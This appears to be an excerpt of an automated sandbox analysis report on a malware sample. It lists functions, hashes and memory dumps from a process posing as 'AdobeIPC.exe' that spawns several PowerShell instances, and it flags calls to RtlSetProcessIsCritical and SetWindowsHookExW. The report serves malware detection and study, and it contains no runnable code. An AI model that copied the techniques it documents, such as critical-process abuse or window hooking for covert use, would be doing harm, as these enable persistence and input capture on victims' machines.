API String ID:
Opcode ID: e52949e52225f576e1923d29bf11d6d9da7338db33dd1a69374e3ff9d6157943
Instruction ID: b2f6af97ca2dd637f29e72d898bb5de4dd8d81abd063f0fdc226cfd2d98a5435
Opcode Fuzzy Hash: e52949e52225f576e1923d29bf11d6d9da7338db33dd1a69374e3ff9d6157943
Instruction Fuzzy Hash: D7312CF17252018BE7484939990CF37A5DE6BC2748F18CA7BD50AE72A1DAB8CC404751

Function 072E276C Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3018885500.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72e0000_Stellar Generator.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d12efe6591c2534cbb6352eef7c92a2d2ad59df6536edb04bb4c49afc0764a41
Instruction ID: ef793e36c3e103578812601ae054c8de2c9f67100bbe465734faf269f2c95eac
Opcode Fuzzy Hash: d12efe6591c2534cbb6352eef7c92a2d2ad59df6536edb04bb4c49afc0764a41
Instruction Fuzzy Hash: 8601F260F381109BD30CD53ED85863B278FABD5722F49C97AA80BDB3A5CC74CD010A82

Function 072E3069 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3018885500.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72e0000_Stellar Generator.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e96c2d09a4494225f80b0fcbc7d86fec4437ece084be86fc2191e3d222bcecd4
Instruction ID: 452ede6e02391c28b8438b6bb2512394cd0d046e33ec17fc22b257499c4ed86a
Opcode Fuzzy Hash: e96c2d09a4494225f80b0fcbc7d86fec4437ece084be86fc2191e3d222bcecd4
Instruction Fuzzy Hash: 7701D465F382108FD70C953A995826A274F6BD5622F4D89BB980ADB2A2CC78CD014A82

Analysis Process: AdobeIPC.exePID: 7364, Parent PID: 7284COMMON

Execution Graph

Execution Coverage:	22%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	6
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9B7F3F3D Relevance: 1.6, APIs: 1, Instructions: 142
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlSetProcessIsCritical.NTDLL ref: 00007FFD9B7F4012

Memory Dump Source

Source File: 00000002.00000002.3043990020.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd9b7f0000_AdobeIPC.jbxd

Similarity

API ID: CriticalProcess
String ID:
API String ID: 2695349919-0
Opcode ID: acee5822b95936c403faea3118812dad6515a12941b630b8e8ee596b6b59b686
Instruction ID: 47b09465b263f1583eec7403d02922dc1ac306a7840549fd3bedf40dbb7b321a
Opcode Fuzzy Hash: acee5822b95936c403faea3118812dad6515a12941b630b8e8ee596b6b59b686
Instruction Fuzzy Hash: 7D41F43190C7488FD719DFA8C855AE9BBF0FF56311F04416ED08AC3692CB786846CB91

Function 00007FFD9B7F4898 Relevance: 1.6, APIs: 1, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32 ref: 00007FFD9B7F4961

Memory Dump Source

Source File: 00000002.00000002.3043990020.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd9b7f0000_AdobeIPC.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 80db3310c4bf0974e6020ff9f25855a905c2b463d3b4752781c98d988c774282
Instruction ID: 1aa7adbdba0d6183e4ec047da494f578b81f7db8203007baee1931d19de5dd9f
Opcode Fuzzy Hash: 80db3310c4bf0974e6020ff9f25855a905c2b463d3b4752781c98d988c774282
Instruction Fuzzy Hash: 9941D630A1CA5D4FDB18DF5C985A6F9BBE1EB59311F00427ED05DD3296CA64A81287C1

Analysis Process: powershell.exePID: 7560, Parent PID: 7364COMMON

Executed Functions

Function 00007FFD9B6DE380 Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

<3 4, xrefs: 00007FFD9B6DE416

Memory Dump Source

Source File: 00000004.00000002.1835588559.00007FFD9B6DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b6dd000_powershell.jbxd

Similarity

API ID:
String ID: <3 4
API String ID: 0-161747931
Opcode ID: a13ee6bc9d7b4419363b28762edb3033dad523e9b78fcf013b63d5c6af53065e
Instruction ID: 415ea88a5488557b97dc8d9af3f6a01b72c5a0097e87c9c17fe5ff87bd0ccfcd
Opcode Fuzzy Hash: a13ee6bc9d7b4419363b28762edb3033dad523e9b78fcf013b63d5c6af53065e
Instruction Fuzzy Hash: BD41F67150EBC44FEB668B299C559623FB0EF52314B1606EFD0C8CB1A3D625B846C792

Function 00007FFD9B7F644D Relevance: .7, Instructions: 662COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1835997288.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b7f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d80f2a4b161285c62e290093e438dfe4725fa338dcac36265dfa6d53d8f55f6f
Instruction ID: 251bf5416ea2f49d0a28fefb1dbac81602faaae59d5b19bef0f8281af72de1a0
Opcode Fuzzy Hash: d80f2a4b161285c62e290093e438dfe4725fa338dcac36265dfa6d53d8f55f6f
Instruction Fuzzy Hash: A6C16131B19A4D8FDF94DF58C465AADBBE1FF68300F15426AD409D72A6CA34E881CBC1

Function 00007FFD9B8C6605 Relevance: .4, Instructions: 440COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1836849071.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6f67d54de84686a611e31d7b2d5e6bb896591683d572e6fe6849edc70c5f5c8
Instruction ID: 26873acebaf1b9149a96864ef852d64a4d152e47a1fa039c0b2405cabd2fbc3a
Opcode Fuzzy Hash: f6f67d54de84686a611e31d7b2d5e6bb896591683d572e6fe6849edc70c5f5c8
Instruction Fuzzy Hash: E6D138B2A0FA8E4FEB65AB6848745B57BE0EF6A310B1901FFD45CCB0E7D914A905C341

Function 00007FFD9B7FA0D3 Relevance: .3, Instructions: 255COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1835997288.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b7f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 317e491717782a9834f0f9e3629ebdbdf032220439d0cdfd3d7ff5344b470d4c
Instruction ID: 0926cc51251ddac843707e782bea3d77d75aec887735d5e46de01e53f04a7bb7
Opcode Fuzzy Hash: 317e491717782a9834f0f9e3629ebdbdf032220439d0cdfd3d7ff5344b470d4c
Instruction Fuzzy Hash: 67114C26A0EBC84FD7539B6898790A47FB0EF63215B0E01EBD4D8CB0B3D9195909C792

Function 00007FFD9B7F9758 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1835997288.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b7f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93ae278dc0cdd04dae635bb9ceef53dd599746964786e80bde363afb3353825c
Instruction ID: 83a6a08d9f5beb266a791b7a385e3d5f1f42db317e8f9f37ff149c93b0c85106
Opcode Fuzzy Hash: 93ae278dc0cdd04dae635bb9ceef53dd599746964786e80bde363afb3353825c
Instruction Fuzzy Hash: AB31EC71A1CB4C4FDB589F5C984A6B97BE1FB98311F00426FE44993252DB30B855CBC2

Function 00007FFD9B7FA62C Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1835997288.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b7f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6757d155ffe01f897d4a0b1cb54bdca542d86954256ebb2dac04d1c8875c8d0a
Instruction ID: 49f67b4acec2f9986a1c1aac3e48c8c2d919bd0846ce671bcb68be7f1878606a
Opcode Fuzzy Hash: 6757d155ffe01f897d4a0b1cb54bdca542d86954256ebb2dac04d1c8875c8d0a
Instruction Fuzzy Hash: 1721F830A0CB4C4FDB59DBAC984A7E97FF0EB96321F04426FD449C3162DA749416CB92

Function 00007FFD9B7F33B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1835997288.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b7f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe3015034deb5dbf47cf00e65675b797d8b75d8dade4ca284cf0fd1ddac37132
Instruction ID: f015c6d8f1291ae9f9a84129c24d6f916cfece872e45c549876b83854877da12
Opcode Fuzzy Hash: fe3015034deb5dbf47cf00e65675b797d8b75d8dade4ca284cf0fd1ddac37132
Instruction Fuzzy Hash: D001A73020CB0C4FD748EF0CE051AA5B7E0FF85360F10056DE58AC36A1DA32E882CB45

Function 00007FFD9B8C414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1836849071.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4944447716ba0d297bacc29b7f448e11fcefd9eba2fe9c8e87cf0d61fb01eeee
Instruction ID: 8ddff8c351ce5c48f9b4221a386d33259961e4e013b797b30af5025ac600189f
Opcode Fuzzy Hash: 4944447716ba0d297bacc29b7f448e11fcefd9eba2fe9c8e87cf0d61fb01eeee
Instruction Fuzzy Hash: 45F09A32B0E5098FD768EB4CE4518A873E0EF5932071600BBE0ADC75B3CA25EC808780

Function 00007FFD9B8C4400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1836849071.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6150e8b5b708921a55837121cab160314438319b7898c99df2318f6df9e577f4
Instruction ID: 219e146ee37b9a2f09f710847e7b0ddc76e9b2619d5d6a48c27e735fc3090997
Opcode Fuzzy Hash: 6150e8b5b708921a55837121cab160314438319b7898c99df2318f6df9e577f4
Instruction Fuzzy Hash: F6F05E72A0E5498FDB64EB5CE4618A877E0FF4932475600BBE159CB4A3DA25EC90C790

Function 00007FFD9B7F344F Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1835997288.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b7f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cd8bfae00bc1d9d4f78c74c208d8a7bc4d88666e1da42c3b36270f6a3e07a7a
Instruction ID: b5d08048bf8a7f0ff2a1f3774af40c02e5e903cedb3d60f7c4c592466ad8a4ca
Opcode Fuzzy Hash: 2cd8bfae00bc1d9d4f78c74c208d8a7bc4d88666e1da42c3b36270f6a3e07a7a
Instruction Fuzzy Hash: 83E0927260E6190FEB288A2CA8974F47790EB01230744427ED4428A4A3D907648387C8

Function 00007FFD9B8C41D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1836849071.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: 19611bf992d818319ffca05ef679498bf87821be3afbc0c8495d4bacff4bf068
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: DCE0E531B0C8088FDA78EB4CE0519A973E1EB9832171611ABD18EC7562CA22ED918B80

Non-executed Functions

Function 00007FFD9B7F8995 Relevance: 5.1, Strings: 4, Instructions: 149COMMON

Download Yara Rule

Strings

L_^, xrefs: 00007FFD9B7F89C9
L_^, xrefs: 00007FFD9B7F8A6A
L_^, xrefs: 00007FFD9B7F8A2A
L_^, xrefs: 00007FFD9B7F8AC2

Memory Dump Source

Source File: 00000004.00000002.1835997288.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b7f0000_powershell.jbxd

Similarity

API ID:
String ID: L_^$L_^$L_^$L_^
API String ID: 0-2357752022
Opcode ID: f65b79d411b4d421487131a1ec11b2e675d26c383a9eba1e1659f6182ecf37a1
Instruction ID: 2a6eb43ce0c39453e41d896c7ae07a58d5e0ffbbbea2dc1468405cf98c7c7af0
Opcode Fuzzy Hash: f65b79d411b4d421487131a1ec11b2e675d26c383a9eba1e1659f6182ecf37a1
Instruction Fuzzy Hash: 4F41A363B0F7D65FE326876949750997FA0FF1236470A53F7C1D48B0B3ED18250A8296

Function 00007FFD9B7F8BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

L_^4, xrefs: 00007FFD9B7F8BFA
L_^J, xrefs: 00007FFD9B7F8C8A
L_^F, xrefs: 00007FFD9B7F8C7A
L_^7, xrefs: 00007FFD9B7F8C12

Memory Dump Source

Source File: 00000004.00000002.1835997288.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b7f0000_powershell.jbxd

Similarity

API ID:
String ID: L_^4$L_^7$L_^F$L_^J
API String ID: 0-3225005683
Opcode ID: 094baacac4173d964dd07137b5425fa9e43bff048cc2dba61da4707fa992f5a4
Instruction ID: 04a69f08816bc91c8d325c6fadc50cdf1a4162b35631b59aac8caa5ed48679d6
Opcode Fuzzy Hash: 094baacac4173d964dd07137b5425fa9e43bff048cc2dba61da4707fa992f5a4
Instruction Fuzzy Hash: 022126BBB081654ED305BBBDB8199ED3750CFD423935692F2D2A98B093EE147086CAD0

Analysis Process: powershell.exePID: 7860, Parent PID: 7364COMMON

Executed Functions

Function 00007FFD9B806435 Relevance: .7, Instructions: 725COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1938455437.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9b800000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fda4b7410d5249f609ac70419d293e3e1ee031ee4fbe22fde8dee4ce3053d6da
Instruction ID: 493ce91a76c26279276358e67b593a9ac2d5abdc21f18a8c089112cc102caf7e
Opcode Fuzzy Hash: fda4b7410d5249f609ac70419d293e3e1ee031ee4fbe22fde8dee4ce3053d6da
Instruction Fuzzy Hash: CFD1A070A09A4D8FDF98DF58C465AED77F1FF68340F15416AD449D72A6CA34E881CB80

Function 00007FFD9B8D6605 Relevance: .4, Instructions: 407COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1939367232.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9b8d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61e8cb18ae6f2dfec927422f54d749ae1db736fbbd96bf25ac156aa6b8b80139
Instruction ID: 01575155f6402e9f9066508610ba63074a78d1cb7bea610cb0cbc95812fc2e3c
Opcode Fuzzy Hash: 61e8cb18ae6f2dfec927422f54d749ae1db736fbbd96bf25ac156aa6b8b80139
Instruction Fuzzy Hash: BCC159B2B0FACE4FEB659BA848755B57BA1EF9A214B0903FFD04CC70E3D914A9058341

Function 00007FFD9B8D664B Relevance: .4, Instructions: 354COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1939367232.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9b8d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b12296bdbbc2fab2d746ae11ba55f66989d9324baca782000d840f8257c13184
Instruction ID: 6db1edd63985224b02337c13be00a3dc8ef13ecf05bfafd7d1401f9ab690a8a4
Opcode Fuzzy Hash: b12296bdbbc2fab2d746ae11ba55f66989d9324baca782000d840f8257c13184
Instruction Fuzzy Hash: 48B125B2B0FACE4FEB65ABA848645B57BD1EF99214B0903BFD45CC70E3D918A9058341

Function 00007FFD9B80977F Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1938455437.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9b800000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21ae0a2dea27d5bdd665af6e22679e8ad315601260e1364c91a2d68c9723fb51
Instruction ID: 484622af36f2f0da1336b73dfe28eb4de5f855138cccb794c1c8b293ba59283a
Opcode Fuzzy Hash: 21ae0a2dea27d5bdd665af6e22679e8ad315601260e1364c91a2d68c9723fb51
Instruction Fuzzy Hash: E141E87190DB884FDB189F5C9C1A6F97BE0FF99310F04416FE099C3292CA64A955CBC2

Function 00007FFD9B6EEE20 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1937697267.00007FFD9B6ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9b6ed000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63c037c552dc6a3a062f1c5410362e29ff978d08945483eaf6e0bc4ce1ca84bb
Instruction ID: 30df1189694182594e5516b9359167e62dd053e34e7c4c4a57e04da5eae99956
Opcode Fuzzy Hash: 63c037c552dc6a3a062f1c5410362e29ff978d08945483eaf6e0bc4ce1ca84bb
Instruction Fuzzy Hash: 2141167150EBC85FE7568B3898519523FF0EF52320B1605EFD088CF1A3D625A846C792

Function 00007FFD9B80A4BC Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1938455437.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9b800000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1faf4b29c868be4bd2df8019406429a8902101421bacbb9416c16908bea65c1c
Instruction ID: 8b421cdffd0b9bbc59ef07daa460077dccf8b4a4031ff6f07c4aebde7235008c
Opcode Fuzzy Hash: 1faf4b29c868be4bd2df8019406429a8902101421bacbb9416c16908bea65c1c
Instruction Fuzzy Hash: 2221F831A0CB4C4FDB59DBAC984A7E97FE0EB96321F04416FD049C3162D674945ACB92

Function 00007FFD9B8033B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1938455437.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9b800000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction ID: 2b13d53e025c2be8e90647bd55e6abaa926a26a99d8691448afac0a98a8ed019
Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction Fuzzy Hash: A001A73021CB0D4FD748EF0CE051AA6B3E0FF89360F10056DE58AC36A1DA32E882CB41

Function 00007FFD9B8D414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1939367232.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9b8d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f43ac7a68b7b7edc3beae68ec5dee7c1b00d6ea8b50d2f610fbf6570908fa34
Instruction ID: 4095b0f92548fc542584a8f7bbc5a26f76388acf51da6ba4d59dbe5a42cfddd7
Opcode Fuzzy Hash: 9f43ac7a68b7b7edc3beae68ec5dee7c1b00d6ea8b50d2f610fbf6570908fa34
Instruction Fuzzy Hash: 02F09032B0D5494FDB69EB4CE45189473E0EF5932071501BBE06DC71B3CA25EC408740

Function 00007FFD9B8D4400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1939367232.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9b8d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 371d9290c7b2f10e24cfaa18c77802da6f5e73044aad67b0a3d7c85b0e71abfc
Instruction ID: e7b9657fd04f147790b3f7e8ba7ac47512a69620d28140e32b13ac6d1df4e730
Opcode Fuzzy Hash: 371d9290c7b2f10e24cfaa18c77802da6f5e73044aad67b0a3d7c85b0e71abfc
Instruction Fuzzy Hash: 71F0BE32A0E5498FDBA4EB4CE0648A873E0FF4932471601BBE059CB0A3DA25AC80C740

Function 00007FFD9B8D41D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1939367232.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9b8d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: 7088ed3d6d6b9d5ea87a478394cc45f134a04600c237e2e00915a735f27c0c4b
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: 07E01A31B0C8089FDB78DB4CE0519A973E1EB98331B1602BBD14EC7571CA22ED518B80

Non-executed Functions

Function 00007FFD9B808BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON

Download Yara Rule

Strings

K_^<, xrefs: 00007FFD9B808C12
K_^?, xrefs: 00007FFD9B808C2A
K_^N, xrefs: 00007FFD9B808C72
K_^Q, xrefs: 00007FFD9B808C8A
K_^8, xrefs: 00007FFD9B808BF2
K_^K, xrefs: 00007FFD9B808C6A
K_^Y, xrefs: 00007FFD9B808CBA
K_^J, xrefs: 00007FFD9B808C62

Memory Dump Source

Source File: 00000007.00000002.1938455437.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9b800000_powershell.jbxd

Similarity

API ID:
String ID: K_^8$K_^<$K_^?$K_^J$K_^K$K_^N$K_^Q$K_^Y
API String ID: 0-2350917820
Opcode ID: 227aa69b1fbc1c82fa311b63e9fce6667358cd8e78cee4ad2729eeab0005292d
Instruction ID: 0aafbbd5924e028cb88f8fb2682b7fd57e09256c17de00bbea36593f1061e17b
Opcode Fuzzy Hash: 227aa69b1fbc1c82fa311b63e9fce6667358cd8e78cee4ad2729eeab0005292d
Instruction Fuzzy Hash: 6F210477B085555ACB0676BCB8559DC77A0DF9437935642F3E028CF093DD18A48B8680

Analysis Process: powershell.exePID: 5288, Parent PID: 7364COMMON

Executed Functions

Function 00007FFD9B8A6605 Relevance: .4, Instructions: 443COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2075113074.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b8a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec9ae7a5b0611cc53ab170381146367dc899f8607e41374657bdf4fe10718ea1
Instruction ID: fc3197c10e2bf421d34b7efb6eeb1f2fbc593b03fd443998182cf060c738d334
Opcode Fuzzy Hash: ec9ae7a5b0611cc53ab170381146367dc899f8607e41374657bdf4fe10718ea1
Instruction Fuzzy Hash: E7D147A2B0FACE4FEB659BA848745B57BA1EF1A310B0901FED45CC70EBD914A905C361

Function 00007FFD9B7DA53C Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2074069354.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b7d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d83484cdf47cdb02b32cf342b29891fc5267cb188cdc6ebf276ec2178be2be5
Instruction ID: b5daed7d8bc7801130f39061b47f91d77d48d4a45c3564452bb247ff2023d6b7
Opcode Fuzzy Hash: 2d83484cdf47cdb02b32cf342b29891fc5267cb188cdc6ebf276ec2178be2be5
Instruction Fuzzy Hash: 30815D31A0DB8C4FDB59DB6C98596E9BBF0FF96321F0442AFD049C31A2CA746846C791

Function 00007FFD9B8A4073 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2075113074.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b8a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87d9ebed647d67d71d52d7295692e2e363593949837ff92694084014c09088a6
Instruction ID: e7e3b2ac1c35963d0aba9fcbc45b73fe582377af170f5d7a18e0588be4808359
Opcode Fuzzy Hash: 87d9ebed647d67d71d52d7295692e2e363593949837ff92694084014c09088a6
Instruction Fuzzy Hash: 7D512922B0EA8A4FEBA9D75C54626B477D2EF98310B5E00BEC15EC71E3DE15EC058351

Function 00007FFD9B8A4370 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2075113074.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b8a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be616a60820acd4fc4385b0cbcc718f341c1d87b2d1914deeae8958c8da6a67e
Instruction ID: 5249ae82b3675b0a3d06dfa2a6faf049ec746a689821233c310eba0013353365
Opcode Fuzzy Hash: be616a60820acd4fc4385b0cbcc718f341c1d87b2d1914deeae8958c8da6a67e
Instruction Fuzzy Hash: 5C410532B0FA494FEBB9E76C5461AB877D1EF88720B0D00BED15DC71A7E915AD018391

Function 00007FFD9B7D9738 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2074069354.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b7d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28a1e9dc9c9e7bc44f2e78feaf54a35258db75ae6e8ed94cd02c7525f27840e0
